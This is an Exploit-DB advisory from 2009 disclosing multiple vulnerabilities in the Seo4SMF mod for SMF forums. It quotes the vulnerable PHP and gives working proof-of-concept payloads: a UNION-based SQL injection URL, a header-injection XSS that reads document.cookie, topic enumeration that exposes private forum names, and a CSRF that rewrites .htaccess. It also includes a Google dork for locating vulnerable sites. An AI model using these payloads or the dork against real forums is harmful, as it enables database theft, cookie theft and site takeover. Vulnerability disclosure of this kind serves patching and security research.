Seo4SMF for SMF forums - Multiple Vulnerabilities

EDB-ID:

7723

CVE:


EDB Verified:

Author:

WHK

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2009-01-11

Vulnerable App: 
[1] Inyection SQL

Linea 50 al 63
$query = db_query("
SELECT m.ID_TOPIC, m.subject ,b.ID_BOARD, b.name
FROM {$db_prefix}messages AS m, {$db_prefix}boards AS b
WHERE m.ID_TOPIC = *$topic*
AND m.ID_BOARD = b.ID_BOARD
IMIT 1", __FILE__, __LINE__);

------------------------------------------------------------------------

Linea 105 al 108
$query = db_query("
SELECT name FROM {$db_prefix}boards AS b
WHERE ID_BOARD = *$board*
LIMIT 1", __FILE__, __LINE__);

------------------------------------------------------------------------

Linea 125
$request = db_query("SELECT memberName FROM {$db_prefix}members where
ID_MEMBER=".*$user*." limit 1", __FILE__, __LINE__);

------------------------------------------------------------------------

Linea 143
$request = db_query("SELECT subject FROM {$db_prefix}tp_articles where
id=".*$tpage*." limit 1", __FILE__, __LINE__);

Where:

Linea 7 al 13
$topic = $_GET['t'];
$board = $_GET['b'];
$other = $_GET['o'];
$user = $_GET['u'];
$tpage = $_GET['p'];
$action = $_GET['a'];
$param = $_GET['param'];


Now execute the proof of concept:
http://localhost/smf/seo4smf-redirect.php?t=-1 union select 1,2,3…(numero de columnas)…,concat(username(),database()) –
GoogleDorks: http://www.google.cl/search?hl=es&q=allinurl%3Aseo4smf-redirect.php&btnG=Buscar+con+Google&meta=

[2] Inyection of headers, Cross site Scripting and Path disclosure:
Source:

if(!empty <http://www.php.net/empty>($url)){
header <http://www.php.net/header>('HTTP/1.1 301 Moved Permanently');
header <http://www.php.net/header>('Location: '.$url);
exit <http://www.php.net/exit>;
}


The proof of concept:
http://localhost/seo4smf-redirect.php?a=x%0DLocation:%20javascript:alert(document.cookie);
Real test: http://www.jccharry.com/archivos_publicos/xss_seo4smf.png
Or print the error with path disclosure.

[3] Disclosure in topics:
http://localhost/seo4smf-redirect.php?t=[number 1 to total topics].new/topicseen
This return the privates forumnames and topicnames.

[4] Cross site request forgery and inyection of arbitrary code
Source:
if (isset($_POST['htaccess']))
{
$htaccess = stripslashes($_POST['htaccess']);

//str_replace("\\\\","\\",$htaccess);
file_put_contents($boarddir."/.htaccess", $htaccess);
}
csrf -> .htaccess rewrited -> pwned!
and xml files.

exploits and more in
http://foro.elhacker.net/bugs_y_exploits/falla_en_el_mod_seo4smf_para_smf-t241029.0.html
and
http://www.jccharry.com/blog/2009/01/09/whk_fallas-criticas-en-seo4smf-para-foros-smf-simplemachines-forum.html

-={[unica_inc algún dia estaremos juntos]}=-

# milw0rm.com [2009-01-11]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services